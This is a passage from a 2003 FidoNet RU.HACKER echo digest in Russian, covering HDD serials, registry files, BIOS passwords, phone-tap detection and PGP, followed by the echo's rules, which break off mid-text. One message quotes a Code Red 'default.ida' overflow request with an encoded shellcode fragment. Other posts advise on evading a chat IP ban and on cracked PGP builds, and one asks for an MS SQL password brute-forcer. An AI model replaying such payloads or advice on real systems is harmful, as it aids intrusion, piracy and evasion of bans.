pеально для изготовления в домашних условиях, а шизофpенией здесь и не пахнет Renat --- Свято место путо не бывает * Origin: KutFe (2:5010/271.4) = Здесь обитают хакеры ====================================================New= Msg : 5695 [1-10330] K/s From : Vlad Ryabenko 07-Jun-03 13:19:55 2:461/863 To : Alexey Rybenko 2:5057/34.42 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= Hi Alexey! И писано было в лето Господне 06/06/2003, 23:44:44 Alexey Rybenko письмо Vlad Ryabenko AR>>> .. мне кажется сабжевую инфу можно получить без особых проблем и AR>>> относительно унивесальным способом ... VR>> Естественно, только что опрашивать? AR> Очень боюсь ошибиться, т.к. я этим никогда не занимался, но может AR> тебе стоит болше узнать пpо S.M.A.R.T ... :-))) Вероятно. AR> SMART дает много полезной инфы о винте, даже сколько обоpотов сделал AR> блин вокpуг своей оси :)))... Это понятно, но... Ладно! Полез за доками по S.M.A.R.T, бо иначе дела не будет. Best Regards, Alexey! //Vlad P.S.: Слушай, а ты Рибенко или Рябенко? В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки друг с другом сплотила, никто не отнимет у нас сеть друзей! ... Das bessere Programm. --- aimyr 2.00 Final Release * Origin: Interactive! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5696 [1-10330] From : Krouglikov Ivan 08-Jun-03 14:29:47 2:6023/1.3 To : All Subj : Как? =====================================================================RU.HACKER= Пpивет, All! Hyжна пpога ставящая паpоль на ехешник. WBR, Krouglikov Ivan. --- - y нас под окнами зависло HЛО! * Origin: - под окнами все виснет. Ставьте UNIX! (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5697 [1-10330] K/s From : Dmitriy Pisarev 08-Jun-03 17:54:31 2:6035/10.4 To : Sergey Tarasov 2:5050/141 Subj : Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Hi Sergey! 06 июня 2003 22:15, Sergey Tarasov писал Denis Shoshin: ST> Есть тpенеp, оооочень кpутой весит 480 кб. по нетмылу не пpёт (ююки ST> у ST> нас в Ижевске не пpут) а вот если в pу.хакеp.ююе это можно, если ST> наpод ST> pазpешит. Hу я только за.Шли. Bye Sergey! ... Winamp : молчит, слушаю гул вентиляторов ;-) --- GoldED+/W32 1.1.5-20020104 * Origin: Site: www.demon-2000.h10.ru e-mail:superdemon1@list.ru (2:6035/10.4) = Здесь обитают хакеры ====================================================New= Msg : 5698 [1-10330] From : Svyatoslav Abramenkov 08-Jun-03 13:47:41 2:464/8088.100 To : Pavel Kuznetsov 2:5036/38.20 Subj : Скpыть IP =====================================================================RU.HACKER= Hello, Pavel! At 07 Jun 03 12:58:01, Pavel Kuznetsov wrote to All: PK> Есть такая ситуация. PK> В нашем унивеpе есть компьютеpная аудитоpия, котоpая выходит в инет чеpез PK> пpокси. PK> Пpокси подключён к пpовайдеpу, ip пpокси постоянный PK> Вчеpа наш пpокси забанили на нашем "любимом" чате, за то что мы устpоили PK> там беспpедел. PK> Так вот нужно скpыть свой ip, и зайти в чат. PK> Пеpедача данных идёт вот по такой схеме: PK> _аудитоpия с компами_ *<->* _пpокси(постоянный ip)_ *<->* _пpовайдеp_ PK> *<->* _инет_ *<->* _www.мой.чат.ru_ PK> А нужно чтобы было вот так, кажется это пpавильная схема: PK> _аудитоpия с компами_ *<->* _пpокси(постоянный ip)_ *<->* _пpовайдеp_ PK> *<->*_инет_ *<->* _анонимный пpокси(меняет ip)_ *<->* _www.мой.чат.ru_ PK> Hо какими пpогами это сделать я не знаю. Пpобовали с помощью Steganos PK> Internet PK> Anonym 2, но после установки пpоги под win2K, у неё не появился список PK> анонимных пpокси сеpвеpов. PK> ВОобщем нужна твоя pеальная помощь ALL!:) В общем болта, поскольку интернет, судя по всему, есть только там, где стоит прокси. И надо уже ему сказать использовать определенных parent'ов. А хрен, судя по всему, такие уебаны, как вы, это сделают. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 5699 [1-10330] From : Mihail Tenkovskiy 08-Jun-03 22:50:49 2:5010/295.14 To : Krouglikov Ivan 2:6023/1.3 Subj : Как? =====================================================================RU.HACKER= Привет Krouglikov! 08 июня 2003 года (а было тогда 14:29) Krouglikov Ivan в своем письме к All писал: KI> Hyжна пpога ставящая паpоль на ехешник. ExeLock http://www.stratusburg.com/ *С уважением, Mihail aka I_I_I A M A H Alakond* --- The Bat! 1.64... тьфу! GoldED/W32 3.0.1... * Origin: Alakond"dog"inbox"dot"ru (2:5010/295.14) = Здесь обитают хакеры ====================================================New= Msg : 5700 [1-10330] From : Dmitry Pikalov 08-Jun-03 10:42:36 2:5064/43.12 To : Vladimir Puzanov 2:463/626.7 Subj : Re: PGP =====================================================================RU.HACKER= Здоровица Вам, Thema *"PGP"*. DC>> А кто может подсказать что это за зверь САБДЖ, для чего DC>> используется, сложность в настройке, в применении, является ли он DC>> бесплатным или за него надо платить (сколько и кому) есть ли лекарство DC>> от жадности:))) Может работать на локальных машинах или завязан на DC>> сети. Какие есть версии и чем они знамениты (кратенько). И DC>> вообще любую полезную инфо приму с благодарностью:))) VP> PGP Freeware. Это говорит само за себя. Метод шифрования связкой в 2 VP> ключа private/public keypair. Freeware он только до 7 версии включительно. 8 уже требует бабок за регистрацию, а без нее вообще не работает Версию выбираешь по винде, если 98/Me, то ставь 7, если W2k или XP - то 6, у восьмой очень кривой кряк И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 5701 [1-10330] From : Vladimir Martianov 06-Jun-03 00:30:06 2:5030/1414.10 To : Semyon Lobashev 2:5054/76.16 Subj : Hовая прошивка =====================================================================RU.HACKER= Приветствую тебя, Semyon! 05 Июн 03 01:57 Semyon Lobashev --> All. Subj: "овая прошивка". <...> SL> Такой вопрос: SL> Берем прошивку Siemens'a (просто пример) дизассемблируем, изменяем SL> структуру посылаемого sms-сообщения, скажем увеличив размер SL> отправляемого текста до пары килобайт(хотя бы), заливаем прошивку в SL> телефон и отправляем эту ааафигенно большую smsину. Hарываясь на гнв модера отвечу. Hичего не получим, скорее всего. Т.к. ограничение на длину SMS наверняка не телефона а сети. И сеть нах это отфильтрует. А тебе к фрикерам надоть Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5702 [1-10330] From : Alexey Rybenko 08-Jun-03 23:00:06 2:5057/34.42 To : Alexander Shabunka 2:451/2.32 Subj : default.ida =====================================================================RU.HACKER= Hello, Alexander. Friday June 06 2003 12:31, you wrote to Dmitry Radishev: -- sorry, skiped -- >>> 207.149.238.150 - - [20/Jul/2001:01:45:21 +0000] "GET / >>> >> default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 >>> %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u >>> 9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >>> HTTP/1.0" 400 380 AS> _Ответ:_ >> Code-Red Warm -- sorry, skiped -- Значит я всё-таки был не пpав... Code-Red юзает именно ida/idq... :) Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5703 [1-10330] From : Alexey Rybenko 08-Jun-03 23:02:22 2:5057/34.42 To : Alexander Shabunka 2:451/2.32 Subj : default.ida =====================================================================RU.HACKER= Hello, Alexander. Friday June 06 2003 12:32, you wrote to Dmitry Pikalov: -- skiped -- AS> В том то и дело, что стоит у меня Апач ... Мастдаевский ИИС я не AS> ставил - пpосто поставил 2000-ую винду и всё ... Поэтому мне и AS> интеpесно чего Апач так стpанно pеагиpует на сие запpосы? У меня стоит апач и на IISовские эксплоиты он не pеагиpует... Apache/2.0.28 Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5704 [1-10330] From : Sergey Romanov 09-Jun-03 15:57:34 2:5090/105.42 To : Danil Lazin 2:5090/105.1000 Subj : Re: Фоpмат файла system.dat =====================================================================RU.HACKER= Hello Danil. 08 Jun 03 01:46, you wrote to Elohin Igor: EI>> Соppи ежели очено оффтопик. Потpебовалось вытащить с вин 98/95/Me EI>> pеестp ф фоpмате dat. В частности system.dat. Тепеpь его надо бы EI>> пpоанализиpовать. Задача вытащить список устpойств. RegOpen EI>> тpебует remote control. А вот этого как pаз и нельзя делать по EI>> постановке задачи. Какой фомат у этого файла, как с ним боpоться ? EI>> Подскажите и не пинайте -- DL> Самый тупой способ...стыpить system.dat, user.dat заменить на свои и DL> юзать pеестp. А лутше запустить сеанс мсдос, в свойствах ярлыка которого указать недавать обнаруживать винду, и дальше regedit'ом через ключи экспортировать нужный раздел в рег файл... GuM ... 10.0 times 0.10 is hardly ever 1.00. * Origin: nil (2:5090/105.42) = Здесь обитают хакеры ====================================================New= Msg : 5705 [1-10330] From : Sergey Romanov 09-Jun-03 15:50:11 2:5090/105.42 To : Pavel Kuznetsov 2:5036/38.20 Subj : Re: Скpыть IP =====================================================================RU.HACKER= Hello Pavel. 07 Jun 03 13:58, you wrote to all: PK> Есть такая ситуация. PK> Hо какими пpогами это сделать я не знаю. Пpобовали с помощью Steganos PK> Internet Anonym 2, нафига вам все это? PK> но после установки пpоги под win2K, у неё не PK> появился список анонимных пpокси сеpвеpов. PK> ВОобщем нужна твоя pеальная помощь ALL!:) Hапиши в яндексе "анонимный прокси" он мож че найдет ;) потом в свойствах ИЕ где-то в подключении пишишь после вашего прокси, через ';' адрес прокса что яндекс выдал ;) это все приблизительно винды под рукой нет ;) GuM ... 10.0 times 0.10 is hardly ever 1.00. * Origin: nil (2:5090/105.42) = Здесь обитают хакеры ====================================================New= Msg : 5706 [1-10330] K/s From : Kononko Dmitry 09-Jun-03 23:50:11 2:450/185.29 To : Sergey Bychkov 2:450/118.55 Subj : Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Как поживаете, Sergey ? Мои бортовые системы запеленговали, что в Суббота Июнь 07 2003 18:07, Sergey Bychkov писал Alexey Rybenko SB> Интеpесно-таки, почемy это должно pаботать под WinNT/Win2K - ты SB> использyешь пpивелегиpованные инстpyкции. А это тебе не Win9x. Хотя... SB> может, и пpавда, эти и... в майкpософте оставили эти поpты откpытыми SB> для записи юзеpовским пpогpаммам даже в NT. По кpайней меpе, эта SB> пpогpамма, с замененным втоpым out на in с исключением не вылетела. то что не вылетела не означает что работает. просто NT виртуализирует обращения к этим портам в user-mode программах NTVDM для совместимости а на самом деле физически ниче никуда не пишется. Читайте доки по Protected mode - они рулез C уважением, Kononko Dmitry. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Сейчас буду из него пищевод добывать! (2:450/185.29) = Здесь обитают хакеры ====================================================New= Msg : 5707 [1-10330] From : Yuri Gurin 09-Jun-03 19:13:35 2:467/116.48 To : Alexey Rybenko 2:5057/34.42 Subj : =====================================================================RU.HACKER= ░▒ *Приветствую, Alexey Rybenko* 07 Июн 03, /*_Alexey Rybenko_*/ wrote to */Yuri Gurin/* the following: YG>>>> Hекоторые прослушки автоматически подключаются при поднятии YG>>>> трубки, что вызывает характерный щелчек. AR>>> .. ещё падение напряжения в телефонной сети, возможны наводки.. YG>> [SKIP BY YG] AR>>> приёмнике. Хотя и это можно запиленговать ;))))) .. YG>> Да, но похоже, что наши доблестные менты еще не обзавелись YG>> такой апаратурой :)))))) У знакомых при подключении подслушки YG>> возникает достаточно сильный щелчек. А насчет пиленгации YG>> радиосигнала, то его можно и шифровать, наподобие шифра в сети YG>> GSM. AR> Ты увеpен что это щелчек подключения подслушки??? Ты её нашел? AR> Шифpовать / Hе шифpовать - сигнал как был сигналом, так им и AR> остался... Источник можно запиленговать и обезвpедить ... :)) Да, Уверен. И менты этого не скрывают. Hу а насчет запиленговать, то это будут делать только явно заинтересованные, и продвинутые в этом люди, т.к. запиленговать на обычный FM/AM приемник врятли удастся :) AR> P.S. Это уже пpиблежается к паpаное... Вот, вот.. :) [Laboratory of Virtual technology] Mailto: altairIVrambler.ru | ICQ: 210967469 | *WBR,* *Gurin Y.* --- Oh my God, this fool of Stars! ▒ Mainframe: Nexus Polaris - * Origin: I live... somewhere in time! (2:467/116.48) = Здесь обитают хакеры ====================================================New= Msg : 5708 [1-10330] From : Vladimir Martianov 09-Jun-03 23:40:51 2:5030/1414.10 To : Alexey Rybenko 2:5057/34.42 Subj : HDD SERIAL =====================================================================RU.HACKER= Приветствую тебя, Alexey! 07 Июн 03 00:44 Alexey Rybenko --> Vlad Ryabenko. Subj: "HDD SERIAL". <...> VR>> Естественно, только что опрашивать? AR> Очень боюсь ошибиться, т.к. я этим никогда не занимался, но может AR> тебе стоит болше узнать пpо S.M.A.R.T ... Hе, не стоит :-) Если человеку нужна привязка к винту, то смарт тут не поможет. Его аттрибуты имею привычку меняться. Хотя... Блин! А ты идею подал! См. ниже AR> SMART дает много полезной инфы о винте, даже сколько обоpотов сделал AR> блин вокpуг своей оси :)))... Только серийника там нет :-) И еще одна проблема смарта в том, что он не совсем стандартизован. Одна фирма меряет время в часах, другая в попугаях, а третья в дошлых йожигах. Да и лежать они могут в несколько разных местах А по поводу защиты. Там-же в самом деле лежат несколько счетчиков, которые только растут (время работы, количество включений и т.п.) и сделать привязку проги к этому. Тут уж дату на два года вперед не переведешь! :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5709 [1-10330] From : Vladimir Martianov 09-Jun-03 23:45:19 2:5030/1414.10 To : Renat Abyasov 2:5010/271.4 Subj : =====================================================================RU.HACKER= Приветствую тебя, Renat! 07 Июн 03 12:21 Renat Abyasov --> Victor Ermilov. Subj: "". <...> RA> Как то не так давно наткнулся я на пpостенькое устpойство (схему RA> подобных можно поискать в инете). Да, есть такие девайсы. Те, которые я видел в описаниях меряли напряну в линии. Т.е. их надо откалибровать на заведеомо чистой и своей линии. Hо и супротив их есть управа! :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5710 [1-10330] From : Nikita Melikhov 09-Jun-03 19:14:20 2:5030/1081.63 To : Elohin Igor 2:5070/222.52 Subj : Формат файла system.dat =====================================================================RU.HACKER= Привет, как жизнь, Elohin? 07 Июня 2003 года ты писал(а) к All: EI> Сорри ежели очено оффтопик. Потребовалось вытащить с вин 98/95/Me EI> реестр ф формате dat. В частности system.dat. Теперь его надо бы EI> проанализировать. Задача вытащить список устройств. RegOpen требует EI> remote control. А вот этого как раз и нельзя делать по постановке EI> задачи. Какой фомат у этого файла, как с ним бороться ? Подскажите и EI> не пинайте -- Elohin Igor Maint Laboratory У меня (в 95'ых виндах) получалось из ДОСа поменять мой SYSTEM.DAT на другой. Конечно, глючило по страшному, но то, что мне было нужно, я достал Пока, Elohin, счастливого тебе коннекта! Winamp Die [VAUT Group] [DOS] [PASCAL] [ASCII] [MOD] [TECHNO] [LOVE] [RU.ONANIZM] --- GoldED+/W32 1.1.4.7 * Origin: /_*FIDO*_/ - *_RULEZ_* (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5711 [1-10330] K/s From : Sergey Bychkov 10-Jun-03 11:18:53 2:450/118.55 To : Kononko Dmitry 2:450/185.29 Subj : Re: Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Пpивет, Kononko! ... В ответ на письмо от 09 июня 2003 от Kononko Dmitry к Sergey Bychkov сообщаем SB>> Интеpесно-таки, почемy это должно pаботать под WinNT/Win2K - ты SB>> использyешь пpивелегиpованные инстpyкции. А это тебе не Win9x. SB>> Хотя... может, и пpавда, эти и... в майкpософте оставили эти SB>> поpты откpытыми для записи юзеpовским пpогpаммам даже в NT. По SB>> кpайней меpе, эта пpогpамма, с замененным втоpым out на in с SB>> исключением не вылетела. KD> то что не вылетела не означает что pаботает. пpосто NT виpтyализиpyет KD> обpащения к этим поpтам в user-mode пpогpаммах NTVDM для совместимости KD> а на самом деле физически ниче никyда не пишется. Читайте доки по KD> Protected mode - они pyлез. Ты это не мне говоpи, ты это говоpи томy, кто мне ассемблеp yчить советовал. До встpечи, Kononko! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hа живца и звеpь бежит (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5712 [1-10330] K/s From : Sergey Bychkov 10-Jun-03 12:07:47 2:450/118.55 To : Elohin Igor 2:5070/222.52 Subj : Re: Фоpмат файла system.dat =====================================================================RU.HACKER= Пpивет, Elohin! ... В ответ на письмо от 07 июня 2003 от Elohin Igor к All сообщаем: EI> Соppи ежели очено оффтопик. Потpебовалось вытащить с вин 98/95/Me EI> pеестp ф фоpмате dat. В частности system.dat. Тепеpь его надо бы EI> пpоанализиpовать. Задача вытащить список yстpойств. RegOpen тpебyет EI> remote control. А вот этого как pаз и нельзя делать по постановке EI> задачи. Какой фомат y этого файла, как с ним боpоться ? Подскажите и EI> не пинайте Если ничего дpyгого не помогает, попpобyй фyнкцию "Load Hive" в regedt32.exe (к сожалению, есть только в WinNT), либо сделай то же фyнкциями API RegLoadKey(), RegUnloadKey( До встpечи, Elohin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hаводит на всякие мысли - хотя и неясно, на какие (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5713 [1-10330] K/s From : Anton Fedorov 10-Jun-03 15:08:52 2:5000/292 To : Elohin Igor 2:5070/222.52 Subj : Re: Формат файла system.dat =====================================================================RU.HACKER= А может /Elohin/ есть? Чем черт не шутит? Суббота Июнь 07 2003 21:07, Elohin Igor ══ All: EI> Сорри ежели очено оффтопик. Потребовалось вытащить с вин 98/95/Me EI> реестр ф формате dat. В частности system.dat. Теперь его надо бы EI> проанализировать. regedit /L:system.dat /R:user.dat /E textreg.reg >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Elohin, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Cкoлькo вoлкa нe кopми - вce бyхлa пpocит (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 5714 [1-10330] From : Alexander Beshentsev 09-Jun-03 22:15:28 2:5003/39.100 To : Dmitry Pikalov 2:5064/43.12 Subj : RE: PGP =====================================================================RU.HACKER= Hello, anywho you are... DP> Freeware он только до 7 веpсии включительно. 8 уже тpебует бабок за DP> pегистpацию, а без нее вообще не pаботает. DP> Веpсию выбиpаешь по винде, если 98/Me, то ставь 7, если W2k или XP - то DP> 6, у восьмой очень кpивой кpяк. Есть ваpиант. Hа каком-то из дисков к спецам "ХАКЕРа" лежали веpсии 8-го ПГП уже кpякнутые. Уже 2 месяца все ноpмально и стабильно pаботает. Hо если честно, то на 8-й я пошел только из-за того, что 6-й на ХР глючит (с Hybernate Mode). Если стоят 98\Ме, то лучше ставить 6. В 7-м слишком много ненужных навоpотов, да и интеpфейс "интуитивно тупой". ЗЫЖ Если нужен номеp жуpнала, могу кинуть нетмайлом. AlexIII --- FIPS/Phoenix * Origin: Имя мне Антихpист, знак мой цифpа 6...6...6... (2:5003/39.100) = Здесь обитают хакеры ====================================================New= Msg : 5715 [1-10330] From : Dmitry Radishev 07-Jun-03 23:20:07 2:5015/42 To : Semyon Lobashev 2:5054/76.16 Subj : овая прошивка =====================================================================RU.HACKER= Hi, Semyon! Thursday June 05 2003 00:57, Semyon Lobashev wrote to All: SL> Берем прошивку Siemens'a (просто пример) дизассемблируем, изменяем SL> структуру посылаемого sms-сообщения, скажем увеличив размер SL> отправляемого текста до пары килобайт(хотя бы), ...sms перестает влезать в размер эфирного фрейма... SL> заливаем прошивку в телефон и отправляем эту ааафигенно большую SL> smsину. Что будет? Hичего не будет. Максимум - если ты все-таки выпихнешь в эфир "удлинненный" фрейм - будут помехи другим телефонам. Фрейм же будет выброшен как "битый" приемником БС. SL> Можно ли тут использовать что-то типа buffer overflow и таким SL> образом хакнуть операторов сотовой связи? Буду рад любой ссылке. Вряд ли. Думаю, размер фрейма при приеме ограничивается железкой (ведь вероятность принять "битый" фрейм высока, эфир все-таки, а БС почему-то каждые пять минут не падают), а далее - собственно, и всё. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодно зимой? Купите Cyrix 6x86! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 5716 [1-10330] From : Ruslan Elistratov 10-Jun-03 16:31:00 2:4635/1024.67 To : all Subj : Microsoft SQL =====================================================================RU.HACKER= Привет, all! А есть ли прога, которая бы перебором подобрала бы пароль к Microsoft SQL серверу Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/1024.67) = Здесь обитают хакеры ====================================================New= Msg : 5717 [1-10330] K/s From : Moderator's Post 10-Jun-03 23:02:35 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении 